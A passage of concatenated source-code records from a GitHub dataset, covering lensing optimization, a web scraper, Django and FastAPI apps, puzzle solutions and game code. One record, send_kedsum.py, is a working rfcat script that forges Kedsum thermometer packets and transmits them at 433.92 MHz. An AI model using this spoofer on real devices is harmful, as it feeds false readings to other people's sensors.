mindis_front=10,\n                                    mindis_back=0, logmasscut_front=0,\n                                    logabsolute_mass_cut_front=0,\n                                    logmasscut_back=20,\n                                    logabsolute_mass_cut_back=20)\n\n    background = realization.filter(datatofit.x, datatofit.y, mindis_front=0,\n                                    mindis_back=10, logmasscut_front=20,\n                                    logabsolute_mass_cut_front=20,\n                                    logmasscut_back=0,\n                                    logabsolute_mass_cut_back=0)\n\n    return foreground, background\n\ndef optimize_foreground(macromodel, realizations, datatofit,tol_source,tol_mag, tol_centroid, centroid_0, n_particles, n_iterations,\n                        source_shape, source_size_kpc, polar_grid, optimizer_routine, re_optimize, verbose, particle_swarm, restart, 
constrain_params, pso_convergence_mean, pso_compute_magnification, tol_simplex_params,\n tol_simplex_func, simplex_n_iter, solver_class, LOS_mass_sheet_front, LOS_mass_sheet_back, centroid, satellites,\n check_foreground_fit, foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n reoptimize_scale, particle_swarm_reopt):\n\n #foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n #reoptimize_scale, particle_swarm_reopt = foreground_mass_filters(m_ref, LOS_mass_sheet_front)\n\n source_x, source_y = 0, 0\n\n for h in range(0, len(foreground_filters)):\n\n optimizer_kwargs = {'save_background_path': True, 're_optimize_scale': reoptimize_scale[h]}\n\n if h == 0:\n\n realization_filtered = realizations[0].filter(datatofit.x, datatofit.y, mindis_front=foreground_filters[h],\n mindis_back=1, source_x = source_x, source_y=source_y,\n logmasscut_front=foreground_globalmin_masses[h],\n logabsolute_mass_cut_front = foreground_aperture_masses[h],\n logmasscut_back=12,\n logabsolute_mass_cut_back=12, centroid = centroid, zmax=solver_class.zmain)\n if verbose:\n print('initial optimization')\n\n else:\n\n macromodel = model[0].lens_components[0]\n re_optimize = True\n particle_swarm = particle_swarm_reopt[h]\n optimizer_kwargs.update({'re_optimize_scale': reoptimize_scale[h]})\n\n real = realizations[0].filter(datatofit.x, datatofit.y, mindis_front=foreground_filters[h],\n source_x = source_x, source_y=source_y,\n logmasscut_front=foreground_globalmin_masses[h], logmasscut_back=12, ray_x=out_kwargs['path_x'],\n ray_y=out_kwargs['path_y'], logabsolute_mass_cut_back=12,\n path_redshifts=out_kwargs['path_redshifts'],\n path_Tzlist=out_kwargs['path_Tzlist'],\n logabsolute_mass_cut_front = foreground_aperture_masses[h], zmax=solver_class.zmain)\n\n if verbose:\n print('optimization '+str(h+1))\n\n realization_filtered = real.join(realization_filtered)\n\n N_foreground_halos = len(realization_filtered.masses[np.where(realization_filtered.redshifts <= solver_class.zmain)])\n\n if verbose:\n print('nhalos: ', len(realization_filtered.halos))\n print('aperture size: ', foreground_filters[h])\n print('minimum mass in aperture: ', foreground_aperture_masses[h])\n print('minimum global mass: ', foreground_globalmin_masses[h])\n print('N foreground halos: ', N_foreground_halos)\n\n do_optimization = True\n if h > 0:\n if N_foreground_halos == 0:\n do_optimization = False\n if N_foreground_halos == N_foreground_halos_last:\n do_optimization = False\n\n if do_optimization:\n\n lens_system = solver_class.build_system(main=macromodel, realization=realization_filtered, multiplane=True,\n LOS_mass_sheet_front=LOS_mass_sheet_front,\n LOS_mass_sheet_back=LOS_mass_sheet_back, satellites=satellites)\n\n optimized_data, model, out_kwargs, keywords_lensmodel = solver_class._optimize_4imgs_lenstronomy([lens_system],\n data2fit=datatofit,\n tol_source=tol_source,\n tol_mag=tol_mag,\n tol_centroid=tol_centroid,\n centroid_0=centroid_0,\n n_particles=n_particles,\n n_iterations=n_iterations,\n source_shape=source_shape,\n source_size_kpc=source_size_kpc,\n return_ray_path=True,\n polar_grid=polar_grid,\n optimizer_routine=optimizer_routine,\n verbose=verbose,\n re_optimize=re_optimize,\n particle_swarm=particle_swarm,\n restart=restart,\n constrain_params=constrain_params,\n pso_convergence_mean=pso_convergence_mean,\n pso_compute_magnification=pso_compute_magnification,\n tol_simplex_params=tol_simplex_params,\n tol_simplex_func=tol_simplex_func,\n 
simplex_n_iter=simplex_n_iter,\n optimizer_kwargs=optimizer_kwargs,\n finite_source_magnification=False,\n chi2_mode='source', adaptive_grid=False)\n\n source_x, source_y = keywords_lensmodel['source_x'], keywords_lensmodel['source_y']\n foreground_rays = out_kwargs['precomputed_rays']\n foreground_macromodel = model[0].lens_components[0]\n N_foreground_halos_last = N_foreground_halos\n\n else:\n model[0].realization = realization_filtered\n foreground_macromodel = model[0].lens_components[0]\n\n if check_foreground_fit:\n\n if chi_square_img(datatofit.x, datatofit.y, optimized_data[0].x, optimized_data[0].y, 0.003) >= 1:\n return None, None, None, None, None\n\n return foreground_rays, foreground_macromodel, [realization_filtered], keywords_lensmodel, optimized_data\n\ndef optimize_background(macromodel, realization_foreground, realization_background, foreground_rays, source_x, source_y, datatofit, tol_source, tol_mag, tol_centroid, centroid_0, n_particles,\n n_iterations, source_shape, source_size_kpc, polar_grid, optimizer_routine, re_optimize, verbose,\n particle_swarm, restart, constrain_params, pso_convergence_mean, pso_compute_magnification,\n tol_simplex_params, tol_simplex_func, simplex_n_iter, solver_class,\n background_globalmin_masses = None, background_aperture_masses = None, background_filters = None,\n reoptimize_scale = None, optimize_iteration = None, particle_swarm_reopt = None,\n LOS_mass_sheet_front = 7.7, LOS_mass_sheet_back = 8, centroid = None, satellites = None,\n ):\n\n assert len(background_filters) == len(background_aperture_masses)\n assert len(background_globalmin_masses) == len(background_filters)\n\n N_iterations = len(background_filters)\n backx, backy, background_Tzs, background_zs, reoptimized_realizations = [], [], [], [], []\n\n for h in range(0, N_iterations):\n if verbose:\n print('iterating ' + str(h + 1) + ' of ' + str(N_iterations) + '... 
')\n\n        if h == 0:\n\n            if verbose:\n                print('initial background optimization')\n\n            optimizer_args = {'save_background_path': True,\n                              're_optimize_scale': reoptimize_scale[h],\n                              'precomputed_rays': foreground_rays}\n\n            filtered_background = realization_background.filter(datatofit.x, datatofit.y, mindis_front=0,\n                                                 mindis_back=background_filters[h], logmasscut_front=12,\n                                                 logabsolute_mass_cut_front=12, source_x=source_x, source_y=source_y,\n                                                logmasscut_back=background_globalmin_masses[h],\n                                                logabsolute_mass_cut_back=background_aperture_masses[h],\n                                                zmin=solver_class.zmain)\n\n            realization_filtered = realization_foreground.join(filtered_background)\n\n        else:\n\n            macromodel = model[0].lens_components[0]\n            re_optimize = True\n            particle_swarm = particle_swarm_reopt[h]\n            optimizer_args.update({'re_optimize_scale': reoptimize_scale[h]})\n            #optimizer_args.update({'save_background_path': True})\n            #optimizer_args.update({'precomputed_rays': foreground_rays})\n\n            filtered_background = realization_background.filter(datatofit.x, datatofit.y, mindis_front=0,\n                                    logmasscut_front=12, mindis_back = background_filters[h],\n                                    source_x=source_x, source_y=source_y, logmasscut_back=background_globalmin_masses[h],\n                                    logabsolute_mass_cut_back=background_aperture_masses[h],\n                                    logabsolute_mass_cut_front=12, zmin=solver_class.zmain)\n\n            realization_filtered = realization_filtered.join(filtered_background)\n\n        # realization_filtered = realizations[0].realization_from_indicies(np.squeeze(filter_indicies))\n        N_background_halos = len(realization_filtered.masses[np.where(realization_filtered.redshifts > solver_class.zmain)])\n        realization_filtered = realization_filtered.shift_background_to_source(source_x, source_y)\n        if verbose:\n            print('N foreground halos: ', len(realization_filtered.masses[np.where(realization_filtered.redshifts <= solver_class.zmain)]))\n            print('N background halos: ', N_background_halos)\n            print('N total: ', len(realization_filtered.masses))\n\n            print('aperture size: ', background_filters[h])\n            print('minimum mass in aperture: ', background_aperture_masses[h])\n            print('minimum global mass: ', background_globalmin_masses[h])\n\n        do_optimization = True\n\n        if h > 0:\n            if N_background_halos == 0:\n                do_optimization = False\n            if N_background_halos == N_background_halos_last:\n                do_optimization = False\n            #print(optimize_iteration[h])\n            if optimize_iteration[h] is False:\n                do_optimization = False\n\n        if do_optimization:\n\n            lens_system = solver_class.build_system(main=macromodel, realization=realization_filtered,\n                                                    multiplane=True, LOS_mass_sheet_front = LOS_mass_sheet_front,\n                                                    LOS_mass_sheet_back = LOS_mass_sheet_back, satellites=satellites)\n\n            optimized_data, model, out_kwargs, keywords_lensmodel = solver_class._optimize_4imgs_lenstronomy([lens_system],\n                                                        data2fit=datatofit,tol_source=tol_source,\n                                                        tol_mag=tol_mag,\n                                                        tol_centroid=tol_centroid,\n                                                        centroid_0=centroid_0,\n                                                        n_particles=n_particles,\n                                                        n_iterations=n_iterations,\n                                                        source_shape=source_shape,\n                                                        source_size_kpc=source_size_kpc,\n
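                                                        # Re-run the lens-model optimization against the updated (foreground + background) halo realization.\n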
return_ray_path=True,\n polar_grid=polar_grid,\n optimizer_routine=optimizer_routine,\n verbose=verbose,\n re_optimize=re_optimize,\n particle_swarm=particle_swarm,\n restart=restart,\n constrain_params=constrain_params,\n pso_convergence_mean=pso_convergence_mean,\n pso_compute_magnification=pso_compute_magnification,\n tol_simplex_params=tol_simplex_params,\n tol_simplex_func=tol_simplex_func,\n simplex_n_iter=simplex_n_iter,\n optimizer_kwargs=optimizer_args,\n finite_source_magnification=False,\n chi2_mode='source', adaptive_grid=False)\n\n # path_x, path_y, path_redshifts, path_Tzlist = out_kwargs['path_x'], out_kwargs['path_y'], \\\n # out_kwargs['path_redshifts'], out_kwargs[\n # 'path_Tzlist']\n # source_x, source_y = keywords_lensmodel['source_x'], keywords_lensmodel['source_y']\n # backx.append(path_x)\n # backy.append(path_y)\n # background_Tzs.append(path_Tzlist)\n # background_zs.append(path_redshifts)\n reoptimized_realizations.append(realization_filtered)\n N_background_halos_last = N_background_halos\n\n else:\n model[0].realization = realization_filtered\n reoptimized_realizations.append(realization_filtered)\n\n\n return optimized_data, model, \\\n (backx, backy, background_Tzs, background_zs, reoptimized_realizations), keywords_lensmodel\n\ndef foreground_mass_filters(realization, LOS_mass_sheet):\n\n nhalos = len(realization.halos)\n\n if nhalos <= 500:\n\n foreground_aperture_masses = [LOS_mass_sheet, 0]\n foreground_globalmin_masses = [LOS_mass_sheet, LOS_mass_sheet]\n foreground_filters = [10, 0.4]\n reoptimize_scale = [1, 0.5]\n particle_swarm_reopt = [True, False]\n\n else:\n\n foreground_aperture_masses = [LOS_mass_sheet, 7, 0]\n foreground_globalmin_masses = [LOS_mass_sheet, LOS_mass_sheet, LOS_mass_sheet]\n foreground_filters = [10, 0.3, 0.1]\n reoptimize_scale = [1, 0.5, 0.5]\n particle_swarm_reopt = [True, True, False]\n\n return foreground_aperture_masses, foreground_globalmin_masses, foreground_filters, \\\n reoptimize_scale, particle_swarm_reopt\n\ndef background_mass_filters(realization, LOS_mass_sheet):\n\n rung_0_mass = LOS_mass_sheet\n rung_0_window = 10\n\n background_aperture_masses = [rung_0_mass]\n background_globalmin_masses = [rung_0_mass]\n background_filters = [rung_0_window]\n reoptimize_scale = [0.4]\n particle_swarm_reopt = [True]\n optimize_iteration = [True]\n\n rung_1_mass = 7.5\n rung_2_mass = 7\n rung_3_mass = 0\n rung_1_window = 0.4\n rung_2_window = 0.3\n rung_3_window = 0.075\n\n nhalos_large = np.sum(realization.masses > 10**7)\n\n if nhalos_large > 150:\n background_aperture_masses += [rung_1_mass, rung_2_mass, rung_3_mass]\n background_globalmin_masses += [rung_0_mass, rung_0_mass, rung_0_mass]\n background_filters += [rung_1_window, rung_2_window, rung_3_window]\n reoptimize_scale += [0.5, 0.4, 0.15]\n particle_swarm_reopt += [False, False, False]\n optimize_iteration += [True, True, False]\n\n else :\n background_aperture_masses += [rung_2_mass, rung_3_mass]\n background_globalmin_masses += [rung_0_mass, rung_0_mass]\n background_filters += [rung_1_window, 0.25]\n reoptimize_scale += [0.5, 0.5]\n particle_swarm_reopt += [False, False]\n optimize_iteration += [True, False]\n\n\n return background_aperture_masses, background_globalmin_masses, background_filters, \\\n reoptimize_scale, particle_swarm_reopt, 
optimize_iteration\n\n","repo_name":"dangilman/MagniPy","sub_path":"MagniPy/Solver/hierarchical_optimization.py","file_name":"hierarchical_optimization.py","file_ext":"py","file_size_in_byte":20454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28897971877","text":"# https://leetcode.com/problems/longest-palindrome/\n# https://leetcode.com/problems/longest-palindrome/discuss/89587/What-are-the-odds-(Python-and-C%2B%2B)\n\nimport collections\n\n\n# first thought, TC:O(n), SC:O(n)\ndef longestPalindrome(s: str) -> int:\n # TC: O(n)\n counter = collections.Counter(s)\n res = 0\n for v in counter.values():\n if v % 2 == 0:\n res += v\n else:\n res += v - 1\n return min(res + 1, len(s)) if res % 2 == 0 else res\n\n\ndef longestPalindrome2(s: str) -> int:\n counter = collections.Counter(s)\n odd = sum([v&1 for v in counter.values()])\n ## +1 only when odd number existing (odd>0)\n return len(s) - odd + (odd>0)","repo_name":"ychanc2104/LeetCode","sub_path":"Longest Palindrome.py","file_name":"Longest Palindrome.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8709683318","text":"#!/usr/bin/env python\n\nimport sys\nimport time\nfrom rflib import *\nfrom struct import *\nimport rflib\nimport bitstring\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('temperature', type=float, help='temperature in °C')\nparser.add_argument('humidity', type=int, help='humidity in %rH')\n\nargs = parser.parse_args()\n\ntemp = args.temperature\nhum = args.humidity\nid = 156\nbatt = 2\nch = 0\n\nprint(\"About to send: {}°C at {} %rH (Batt:{}, CH:{})\".format(temp,hum,batt,ch))\n\ndef crc4(msg):\n remainder = 0\n poly = 0x3 << 4\n bit = 0\n\n for x in range(4):\n remainder ^= msg[x]\n for bit in range(8):\n if remainder & 0x80:\n remainder = (remainder << 1) ^ poly\n else:\n remainder = (remainder << 1)\n return remainder >> 4 & 0x0f\n\ndef tx(msg):\n d=RfCat()\n d.setModeIDLE()\n while (d.getMARCSTATE()[1] not in (MARC_STATE_IDLE,)):\n pass\n\n d.setFreq(433920000)\n d.setMdmModulation(MOD_ASK_OOK)\n d.setMdmDRate(2600)\n d.setMdmChanBW(250000)\n d.setMdmSyncMode(SYNCM_NONE)\n\n # Split into 256 byte chunks\n for i in [rf_data[i:i+255] for i in range(0, len(rf_data), 255)]:\n print(\"Sending chunk with len {}\".format(len(i)))\n d.RFxmit(i)\n\ntemp_f = (temp * 9/5) + 32\ntemp_raw = int(temp_f * 10 + 900)\ntl = temp_raw & 0x0f\ntm = (temp_raw & 0xf0) >> 4\nth = (temp_raw & 0xf00) >> 8\nhl = hum & 0x0f\nhh = (hum & 0xf0) >> 4\nflags = '1000'\n\ndata = '{:08b}{:02b}{:02b}{:04b}{:04b}{:04b}{:04b}{:04b}{:4}'.format(id, batt, ch, tl, tm, th, hl, hh, flags)\n\n# create \"raw data\" byte array to calculate checksum\ncrc_data = bitstring.BitArray(bin=data).tobytes()\ncrc = crc4(crc_data) ^(crc_data[4] >> 4)\ndata_w_crc = \"{:2}{:36}{:04b}\".format(\"00\", data, crc)\n\n# Convert the data to a PWM\npwm_data = ''.join(['10000000000' if b == '1' else '100000' for b in data_w_crc])\n\n# Assemble the final bit stream\npreamble = '100000000000000000000'\nfinal_data = (preamble * 15)\nfinal_data += ((pwm_data + preamble + preamble) * 5)\nfinal_data += pwm_data\n\n# Convert the final bit stream to bytes\nrf_data = 
bitstring.BitArray(bin=final_data).tobytes()\ntx(rf_data)\n","repo_name":"b00lduck/433mhz_thermo_spoof","sub_path":"send_kedsum.py","file_name":"send_kedsum.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8825479754","text":"from rest_framework import serializers\nfrom django.db.models import F, Sum\nfrom api.funds.models import Fund, FundInterest\nfrom api.analytics.models import EntityAction, EntityStats\nfrom datetime import date\n\n\nclass AnalyticsEntityActionSerializer(serializers.ModelSerializer):\n class Meta:\n model = EntityAction\n fields = '__all__'\n extra_kwargs = {\n 'user': {'read_only': True},\n 'company': {'read_only': True},\n 'module': {'read_only': True}\n }\n\n def save(self):\n validated_data = self.validated_data\n company = self.get_company(validated_data['entity'], validated_data['entity_id'])\n module = self.get_module(validated_data['entity'])\n # using get_or_create and an explicit save instead of create_or_update because\n # update would not allow us to use a Field expression to increment the\n # view_count\n entity_action, created = EntityAction.objects.get_or_create(\n module=module,\n entity=validated_data['entity'],\n entity_id=validated_data['entity_id'],\n user_action=validated_data['user_action'],\n user=self.context['request'].user.associated_company_users.filter(company=company).first(),\n company_id=company.id,\n )\n\n entity_action.view_count = F(\"view_count\") + 1\n entity_action.save(update_fields=[\"view_count\"])\n\n return entity_action\n\n @staticmethod\n def get_module(entity_type):\n if entity_type == EntityAction.Entity.FUND:\n return EntityAction.Module.INVESTMENTS\n\n raise serializers.ValidationError(\"Invalid Entity Type\")\n\n @staticmethod\n def get_company(entity_type, entity_id):\n if entity_type == EntityAction.Entity.FUND:\n fund = Fund.objects.get(id=entity_id)\n return fund.company\n\n raise serializers.ValidationError(\"Invalid Entity Type and Entity Id\")\n\n\nclass AnalyticsFundInterestSerializer(serializers.ModelSerializer):\n visited_fund_page = serializers.SerializerMethodField()\n visited_interest_page = serializers.SerializerMethodField()\n submitted_interest_form = serializers.SerializerMethodField()\n indication_of_interest_start = serializers.SerializerMethodField()\n indication_of_interest_end = serializers.SerializerMethodField()\n total_equity_investment = serializers.SerializerMethodField()\n total_leverage_requested = serializers.SerializerMethodField()\n answer_details = serializers.SerializerMethodField()\n\n class Meta:\n model = Fund\n fields = ['total_equity_investment','total_leverage_requested','visited_fund_page',\n 'visited_interest_page', 'submitted_interest_form', 'indication_of_interest_start',\n 'indication_of_interest_end', 'answer_details']\n\n\n def get_visited_fund_page(self, obj: Fund):\n return EntityStats().count_visited_fund_page(obj)\n\n\n def get_visited_interest_page(self, obj: Fund):\n return EntityStats().count_visited_interest_page(obj)\n\n @staticmethod\n def get_submitted_interest_form(obj: Fund):\n return FundInterest.objects.filter(fund=obj).count()\n\n @staticmethod\n def get_indication_of_interest_start(obj: Fund):\n return date.today()\n\n @staticmethod\n def get_indication_of_interest_end(obj: Fund):\n return date.today()\n\n @staticmethod\n def get_total_equity_investment(obj: Fund):\n return 
FundInterest.objects.filter(fund=obj).aggregate(sum=Sum('equity_amount'))['sum']\n\n @staticmethod\n def get_total_leverage_requested(obj: Fund):\n return FundInterest.objects.filter(fund=obj).aggregate(sum=Sum('leverage_amount'))['sum']\n\n @staticmethod\n # Returns a sorted dictionary of questions and answers with the count for\n # each answer.\n def get_answer_details(obj: Fund):\n submissions = FundInterest.objects.all().filter(fund=obj)\n results_by_question = {}\n for submission in submissions:\n details = submission.interest_details\n for question, answer in details.items():\n if not isinstance(answer, dict):\n continue\n\n answers = results_by_question.get(question, {})\n answer_value = answer['value']\n count = answers.get(answer_value, 0)\n answers[answer_value] = count + 1\n results_by_question[question] = answers\n\n return dict(sorted(results_by_question.items()))\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/analytics/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14136257982","text":"from urllib import request\r\nimport re\r\nfrom urllib import error\r\n\r\n\r\nclass Spider():\r\n url = 'https://book.douban.com/top250?start=0'\r\n root_pattern = '
([\\s\\S]*?)
'\r\n url_pattern = r'' \r\n div_pattern = '
([\\s\\S]*?)
'\r\n name_pattern = r'(.*?)'\r\n writer_pattern = r'作者.*?
.*?(.*?)'\r\n pub_house_pattern = r'出版社.*?.*?(.*?)
'\r\n pub_company_pattern = r'出品方.*?.*?>(.*?)'\r\n origin_name_pattern = r'原作名.*? (.*?)
'\r\n interpreter_pattern = r'译者.*?.*?(.*?)'\r\n pub_time_pattern = r'出版年.*? (.*?)
'\r\n page_num_pattern = r'页数.*? (.*?)
'\r\n price_pattern = r'定价.*? (.*?)
'\r\n bind_pattern = r'装帧.*? (.*?)
'\r\n ISBN_pattern = r'ISBN.*? (.*?)
'\r\n content_pattern = r'
(.*?)
'\r\n def __fetch_content(self,url):\r\n try:\r\n r = request.urlopen(url)\r\n # bytes\r\n htmls = r.read()\r\n htmls = str(htmls, encoding = 'utf-8')\r\n return htmls\r\n except Exception as e:\r\n print(e)\r\n print('此页为空!')\r\n \r\n def __analysis_url(self,htmls):\r\n sub_urls = []\r\n web_html = re.findall(Spider.root_pattern, htmls)\r\n for html in web_html:\r\n sub_url = re.findall(Spider.url_pattern,html,re.S)[0]\r\n sub_urls.append(sub_url)\r\n return sub_urls\r\n\r\n def __analysis_web(self,url):\r\n sub_info = {}\r\n htmls = self.__fetch_content(url)\r\n if not htmls:\r\n return None\r\n name = self.__handle(Spider.name_pattern,htmls)\r\n content = self.__handle(Spider.content_pattern,htmls)\r\n sub_info['作品'] = name\r\n info_html = re.findall(Spider.div_pattern, htmls) \r\n for html in info_html:\r\n # print(html)\r\n writer = self.__handle(Spider.writer_pattern,html)\r\n pub_house = self.__handle(Spider.pub_house_pattern,html)\r\n pub_company = self.__handle(Spider.pub_company_pattern,html)\r\n origin_name = self.__handle(Spider.origin_name_pattern,html)\r\n interpreter = self.__handle(Spider.interpreter_pattern,html)\r\n pub_time = self.__handle(Spider.pub_time_pattern,html)\r\n page_num = self.__handle(Spider.page_num_pattern,html)\r\n price = self.__handle(Spider.price_pattern,html)\r\n bind = self.__handle(Spider.bind_pattern,html)\r\n ISBN = self.__handle(Spider.ISBN_pattern,html)\r\n sub_info['作者'] = writer\r\n sub_info['出版社'] = pub_house\r\n sub_info['出品方'] = pub_company\r\n sub_info['原作名'] = origin_name\r\n sub_info['译者'] = interpreter\r\n sub_info['出版年'] = pub_time\r\n sub_info['页数'] = page_num \r\n sub_info['定价'] = price\r\n sub_info['装帧'] = bind\r\n sub_info['ISBN'] = ISBN\r\n sub_info['内容简介'] = content\r\n a = 1\r\n return sub_info \r\n def __handle(self,pattern,s):\r\n result = re.findall(pattern,s,re.S)\r\n if not result:\r\n return ''\r\n else:\r\n result = re.findall(pattern,s,re.S)[0].strip()\r\n result = result.replace(' ','')\r\n result = result.replace('\\n','')\r\n result = result.replace('

+{"seq_id":"8982417041","text":"import re\nfrom datetime import datetime\nfrom typing import List\n\nfrom src.models.schemas import Message\n\n\ndef format_messages(messages: List[Message]) -> List[str]:\n    all_items = []\n\n    for message in messages:\n        cleaned = remove_delphos_messages(message.content, message.sender_email)\n        cleaned = remove_quotes(cleaned)\n        cleaned = remove_mentions(cleaned)\n\n        if cleaned:\n            all_items.append(\n                f\"{datetime.fromtimestamp(message.timestamp)} \"\n                f\"{message.sender_full_name}: {cleaned}\"\n            )\n\n    return all_items\n\n\ndef remove_delphos_messages(message: str, sender_email: str) -> str:\n    is_delphos_sender = sender_email == \"delphos-bot@zulip.monadical.com\"\n    is_delphos_message = message.startswith(\"@**Delphos**\")\n    if is_delphos_sender or is_delphos_message:\n        return \"\"\n    return message\n\n\ndef remove_quotes(message: str) -> str:\n    if \"** [said](\" in message:\n        message = re.sub(r\"@_\\*\\*(.*?)\\):\", \"\", message)\n        message = re.sub(r\"```quote\\n(.*?)\\n```\", \"\", message)\n        message = re.sub(r\"^\\s+|\\s+$\", \"\", message)\n    return message\n\n\ndef remove_mentions(message: str) -> str:\n    return message.replace(\"**\", \"\")\n","repo_name":"juanArias8/zulip-delphos-bot","sub_path":"src/operators/search/utils/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13942225590","text":"# -------------------------------------------------------------------------\n# File: mb_monster.py\n# Created: Tue Feb 7 20:26:02 2006\n# -------------------------------------------------------------------------\n\nimport random\nimport string\n\nimport mb_io\nimport mb_subs\nfrom mb_monster import Monster\n\nclass Player(Monster):\n    \"\"\"\n    The Player is considered a special type of monster with a few more\n    game book keeping related attributes. The Player is considered\n    a singleton but the creation of only one player is handled outside\n    of this class.\n    \"\"\"\n\n    def __init__(self, gamedir, filename = None):\n\n        \"\"\"\n        Initialize player.\n        \"\"\"\n\n        # The following attributes are internal and are not\n        # defined in the file.\n\n        self.game_dir = gamedir\n        self.last_dir = ''\n\n        # Last direction that sprite was facing.\n\n        self.last_sprite_facing = None\n\n        # The following can be specified in the Player config\n        # file in addition to any Monster attributes. If they\n        # are not defined in the file, they will use these\n        # defaults.\n\n        self.extra_lives = 3\n        self.start_x = 200\n        self.start_y = 200\n\n        # Read Monster attributes from file.\n\n        Monster.__init__(self, self.game_dir, filename)\n        self.read_in_config(filename)\n\n    def read_in_config(self, filename):\n\n        parser = Monster.read_in_config(self, filename)\n\n        if parser.has_section('game'):\n\n            if parser.has_option('game', 'extra_lives'):\n                self.extra_lives = int(parser.get('game', 'extra_lives'))\n            if parser.has_option('game', 'start_x'):\n                self.start_x = int(parser.get('game', 'start_x'))\n            if parser.has_option('game', 'start_y'):\n                self.start_y = int(parser.get('game', 'start_y'))\n\n        return parser\n","repo_name":"CodeChopper/home","sub_path":"python/MonsterBattle/mb_player.py","file_name":"mb_player.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24718174664","text":"from fastapi import FastAPI, Depends, HTTPException, Cookie\nfrom fastapi.security import APIKeyHeader\nfrom fastapi.responses import JSONResponse\nfrom datetime import datetime, timedelta\nimport uvicorn\nimport secrets\nimport hashlib\nimport mysql.connector\n\napp = FastAPI()\nsessions = {}\n\nAPI_KEY_NAME = \"api_key\"\napi_key_header = APIKeyHeader(name=API_KEY_NAME)\n\ndef get_db_connection():\n    conn = mysql.connector.connect(\n        host=\"localhost\",\n        port='3307',\n        user=\"root\",\n        password=\"\",\n        database=\"login_management_db\"\n    )\n    return conn\n\ndef encrypt_key(key: str):\n    return hashlib.sha256(key.encode()).hexdigest()\n\ndef get_api_key(api_key: str = Depends(api_key_header)):\n    # the database stores the hashed key, so hash the incoming key before comparing\n    conn = get_db_connection()\n    cursor = conn.cursor()\n    cursor.execute(\"SELECT * FROM user WHERE api_key=%s\", (encrypt_key(api_key),))\n    user = cursor.fetchone()\n    if not user:\n        raise HTTPException(status_code=400, detail=\"User does not exist\")\n    if user[5] < datetime.now():\n        raise HTTPException(status_code=402, detail=\"Key expired\")\n    return api_key\n\n@app.post(\"/register\")\ndef register(username: str, email: str):\n    api_key = secrets.token_hex(5)\n    encrypted_key = encrypt_key(api_key)\n    expiry_date = datetime.now() + timedelta(days=365)\n    conn = get_db_connection()\n    cursor = conn.cursor()\n    cursor.execute(\"INSERT INTO user (username, email, api_key, createdon, validtill) VALUES (%s, %s, %s, %s, %s)\", (username, email, encrypted_key, datetime.now(), expiry_date))\n    conn.commit()\n    return {\"api_key\": api_key}\n\n@app.get(\"/user/authenticate\")\ndef authenticate(api_key: str = Depends(get_api_key)):\n    session_id = secrets.token_hex(16)\n    sessions[session_id] = api_key\n    response = JSONResponse(content={\"status\": \"success\"})\n    response.set_cookie(key=\"session_id\", value=session_id)\n    return response\n\n@app.get(\"/getUserData\")\ndef get_user_data(session_id: str = Cookie(None)):\n    if session_id not in sessions:\n        raise HTTPException(status_code=401, detail=\"Not authenticated\")\n    api_key = sessions[session_id]\n    conn = get_db_connection()\n    cursor = conn.cursor()\n    cursor.execute(\"SELECT * FROM user WHERE api_key=%s\", (encrypt_key(api_key),))\n    user_data = cursor.fetchone()\n    return {\"username\": user_data[1], \"email\": user_data[2]}\n\nif __name__ == \"__main__\":\n    uvicorn.run(\"main:app\", reload=True, log_level=\"debug\")","repo_name":"aryanaryachoudhary/fastapiweb","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21059739627","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n-------------------------------------------------\n   File Name:     excel_converter\n   Description :\n   Author :       patrick\n   date:          2019/10/21\n-------------------------------------------------\n   Change Activity:\n                   2019/10/21:\n   reference site: http://www.python-excel.org/\n-------------------------------------------------\n\"\"\"\n__author__ = 'patrick'\n\nfrom openpyxl import Workbook\n\n\ndef convert_list_to_excel(content, file_name, *headers):\n    column_range = len(headers)\n    content.insert(0, headers)\n    wb = Workbook()\n    ws = wb.active\n    for row_index in range(len(content)):\n        for col_index in range(column_range):\n            ws.cell(row=row_index + 1, column=col_index + 1).value = content[row_index][col_index]\n    # print(index)\n    return wb.save(file_name)\n\n\nif __name__ == '__main__':\n    result = convert_list_to_excel([(\"test1\", \"test2\", \"test3\"), (\"test1\", \"test2\", \"test3\")\n                                    ], \"test_exel.xls\", \"th1\", \"th2\", \"th3\")\n    # print(result)\n","repo_name":"qdriven/low-code-way","sub_path":"topics/tester-ops/tops/testcases/excel_converter.py","file_name":"excel_converter.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"5449836478","text":"l = list(map(int, input().split()))\np = l[0]\nc = l[1]\nflag = False\nn = 1\nwhile not flag:\n    f = n*p\n    if f % 10 == 0:\n        r = n\n        flag = True\n    elif (f-c) % 10 == 0:\n        r = n\n        flag = True\n    else:\n        n += 1\n\nif flag:\n    print(r)","repo_name":"Shidhani/cp","sub_path":"Sheet/Buy a Shovel.py","file_name":"Buy a Shovel.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
